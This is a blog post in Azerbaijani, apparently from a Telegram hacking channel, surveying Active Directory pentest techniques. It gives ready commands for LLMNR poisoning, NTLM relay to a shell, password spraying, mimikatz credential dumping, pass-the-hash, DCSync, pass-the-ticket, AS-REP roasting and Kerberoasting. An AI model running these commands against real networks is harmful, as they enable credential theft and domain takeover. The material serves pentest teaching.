Salam hər vaxtınız xeyir dəyərli oxucular, bu gün Ekslüziv olaraq Active Directory bütün pentest üsullarını haqqında məlumat əldə etməyə və hər birini az da olsa necə baş verdiyini izah etməyə çalışacam.
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Active Directory Bütün Pentest Üsulları
Bu paylaşım biraz uzun ola bilər ona görə ehtiyyatlı olun 😉
LLMNR POİSONİNG Hücumu
LLMNR Active Directory mühitində şəbəkə adlarını server adlarını tanımaq üçün ip adresinə çevirmək üçün istifadə olunan protokoldur.Əsas olaraq kompüterlər digər kompüterlərin adlarını tanımaq üçün bu protokoldan istifadə olunur. DNS olmadığı zaman aktivləşir. LLMNR protokolunun autentifikasiya mexanizmi olmadığı üçün hər kəsə cavab verir bu da protokolun zəifliyidir. Bu zəifliyin istismarı isə responder aləti ilə hədəf şəbəkəni dinləyirik əgər hər hansı istifadəçi səhv ad daxil edərsə bizim responder tərəfindən cavablandırılır və NTLMv2 hash dəyərini ələ keçirmiş oluruq.
responder -I eth0 -dw
Alınan hash dəyərini offline hash crack etmə toolardan istifadə edərək şifrənin özünü əldə edə bilərik.
NTLM RELAY Hücumu
Bu hücum iki fərqli kompüter arasındaki NTLMv2 autentifikasiya trafikinin ələ keçirilib yönləndirilməsi ilə baş verir.Ziyankar şəxs ələ keçirdiyi trafiki başaqa şəxslərə göndərərək onun autentifikasiyasını həyata keçirə bilər.
NTLM RELAY hücumunu yerinə yetirmək üçün hədəf sistemdə SMB signing parametrinin deaktiv olması lazımdır. Bunun üçün crackmapexec aləti ilə SMB signing parametrinin deaktiv olduğu sistemləri təyin edirik.
crackmapexec smb 192.168.1.0/24 --gen-relay-list
Responder aləti ilə NTLM yönləndirməsi üçün responder.conf faylında SMB və HTTP protokollarını deaktiv edin.Ntlmrelayx alətini SMB signing parametri deaktiv olan hədəf kompüterlərə tətbiq edin.
impacket-ntlmrelayx -tf relaytargets.txt -smb2support
Responder aləti ilə hədəf inerfeys bildirərək işə salırıq.Ntlmrelayx aləti ntlm trafikini göstərilən kompütürlərə daxil edir və autentifikasiya sonrası nəticələri bizə bildirir. Bu zəiflikdən istifadə edərək metasploit üzərindən shell belə əldə etmək mümkündür.
responder -I eth0
impacket-ntlmrelayx -tf relaytargets.txt -smb2support -e shell.exe
PASSWORD SPRAYING Hücumu
PASSWORD SPRAYING Hücumu haqqında qısaca demək olarsa müəyyən parolların bəzi istifadəçilər tərəfindən tətbiq edilməsi üzrə yaranır. Əlimizdə olan populyar bir parol bəzi istifadəçilər tərəfindən istifadə oluna bilər ancaq bizim bu haqda məlumatımız yoxdur.Buna görə də userlərin siyahısı üzrə püskürtmə həyata keçiririk.
kerbrute passwordspray -d domain.local --dc 192.168.1.10 users.txt pass.txt
PTH(PASS THE HASH) Hücumu
Pass the Hash istifadəçilərin şifrələrin ələ keçirilməsi yerinə NTLM hashlərinin ələ keçirilməsi və bunun üstündən yerinə yetirilən hücum növüdür.Hədəf kompüterdə NTLM hashlərini ələ keçirmək üçün aşağıdakılardan istifadə edə bilərik.
mimikatz-da
lsadump::lsa
sekurlsa::logonpasswords
PTH hücumun yerinə yetirilməsi
sekurlsa::pth /user:Administrator /domain:domain.local /rc4:<NTLM Hash>
LAPS(Local Administrator Password Solution) İcazəsinin Sui-İstifadəsi
LAPS Microsoft şirkəti tərəfindən Active Directory mühitində yerləşən kompüterlərin Local Admin parollarını idarə etmək üçün yaradılmışdır.LAPS hər bir kompüterə parol təyin edir və onları təhlükəsiz bir şəkildə saxlayır.Əgər Ziyankar şəxs LAPS parolları oxumaq icazəsi olan bir istifadəçini ələ keçirərsə Local Admin hesablarını parollarını ələ keçirə və icazəsiz daxil ola bilər.
DCSYNC Hücumu
DCSync hücumu bir ziyankarın Active Directory mühitinə özünü DC (Domain Controller) olaraq göstərərək AD databaselərində olan informasiyaları ələ keçirməsi üsuludur.Bunun üçün istifadəçinin bu icazələrə sahib olmalıdır.”Replicating Directory Changes” və “Replicating Directory Changes All”
lsadump::dcsync /user:<Kullanıcı Adı> /domain:<Domain Adı> /sid:<Domain SID>
lsadump::dcsync /user:Administrator /domain:example.local /sid:S-1-5-21-1234567890-1234567890-1234567890
DNS Admins Hücumu
DNS Admins qrupu DNS xidmətlərini idarə edən və konfiqurasiya etmək icazələrinə sahibdirlər.Ziyankar şəxslər bu qrupun üzvü olmaqdan istifadə edərək zərərli proqramlar quraşdıra bilər və bütün kompüterləri nəzərət altına ala bilər.
OVER PASS THE HASH Hücumu
Ziyankarın ələ keçirdiyi istifadəçi adına KDC (Key Distrubition Center) TGT bileti tələb etməsi və əldə etdiyi hash dəyərini istifadə etməsi ilə əlaqədar Kerberos hücumudur.Əvvəl əldə etdiyi hash dəyəri ilə TGT istəyi ilə sistemdən TGT biletini əldə edir.
sekurlsa::pth /user:<kullanıcı_adı> /rc4:<NTLM_hash> /domain:<domain_adı> /sid:<domain_SID> /run:<komut>
sekurlsa::pth /user:Administrator /rc4:<NTLM_hash> /domain:example.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /run:cmd
PASS THE TİCKET (PTT)
Pass the Ticket PTT, kompüter şəbəkələrində tez-tez istifadə olunan Kerberos mexanizmini hədəf alan bir hücum növüdür.Bu hücum növü ziyankarın istifadəçinin kerberos biletlərini ələ keçirməyə və şəbəkədəki mənbələrdə daxil olmasına gətirib çıxarır.Bunu yerinə yetirmək üçün OverPass the hash hücumundan əldə etdiyimiz TGT biletindən istifadə edə bilərik.
sekurlsa::pth /ticket:<TGT_ticket> /run:<komut>
sekurlsa::pth /ticket:TGT_ticket_base64 /run:cmd
AS-REP ROASTİNG Hücumu
AS-REP ROASTİNG Hücumu kerberos öncədən doğrulama mexanizmi (Kerberos Pre-authentication) məcburiyyəti olmayan istifadəçiləri hədəfləyən hücumdur.Normal halda istifadəçi öz kimliyini doğrulamazdan əvvəl Kerberos tərəfində ön doğrulama həayat keçirilir. Amma bəzi istifdəçilər tərəfindən bu deaktiv edildikdə hücuma açıq vəziyyətə gələ bilir.
Get-DomainUser | select samaccountname
Get-NetUser -PreAuthNotRequired
GetNPUsers.py -dc-ip <DC_IP> -domain <domain> <user>@<domain>
psexec.py <domain>/<user>@<target_ip> -hashes <NTLM_hash>
KERBEROASTİNG Hücumu
KERBEROASTİNG Hücumu, Service Principal Name (SPN) sahib Active Directory servis hesabının şifrəsinin ələ keçirilməsini imkan verən “post-exploitation” metodudur.
Kimliyi təsdiqlənmiş bir domai istifadəçisi SPN hesabı üçün Kerberos bileti tələb edir.Alınan Kerberos bileti, SPN`ə bağlı servis hesabın parolunun hash dəyəri şifrələnir.Ziyankar sonrakı mərhəldə offline toolardan istifadə edərək parolu ələ keçirə bilər.
Rubeus.exe asktgs /user:<kullanıcı_adı> /rc4:<NTLM_hash> /domain:<domain_adı> /sid:<domain_SID> /target:<target_domain_controller> /output:<output_file>
hashcat -m 13100 -a 0 <ticket_file> wordlist.txt
Constrained Delegation
Müəyyən bir servisin autentifikasiya məlumatlarını yalnız bir servisə yönləndirə bilməsinə imkan verir.Bu təhlükəsizlik boşluqlarını və icazəsiz istifadələrin qarşısını almaq üçün istifadə olunur.
Unconstrained Delegation
Bir servisin autentifikasiya məlumatlarını almadan, başqa bir servisə yönləndirməsinə imkan verir.Yəni bu servisə gələn autentifikasiya məlumatlarını digər servisə yönləndirir və heç bir yoxlama mexanizmi burada yoxdur.
Resource-Based Constrained Delegation
Bu delegation yalnızca limitli bir şəkildə istifadəçilərə və servislərə müəyyən edilmiş mənbələrdən istifadə etməyə imkan verir.Əsas məqsədi isə Delegation edilən zaman təhlükəsizliyin artırılmasıdır.Bu istifadəçilərə və servislərə müəyyən mənblərə autentifikasiya etdikdən sonra daxil olmağa icazə verir.
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat